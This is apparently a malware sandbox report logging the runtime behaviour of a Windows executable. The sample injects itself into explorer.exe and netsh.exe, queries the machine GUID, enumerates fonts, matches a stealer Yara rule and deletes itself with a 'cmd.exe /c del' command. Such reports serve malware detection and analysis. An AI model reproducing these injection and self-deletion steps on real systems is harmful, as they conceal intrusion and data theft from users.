          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | NtClose: Indirect: 0x131A56C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Memory written: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\netsh.exe | Thread register set: target process: 2580
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Process created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1703558154.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.1701959899.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exe  Code function: 6_2_01569B55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Windows\SysWOW64\netsh.exe  Code function: 6_2_015692E8 memset,GetVersionExW
Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\explorer.exe  Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Stealing of Sensitive Information

Source: Yara match  File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
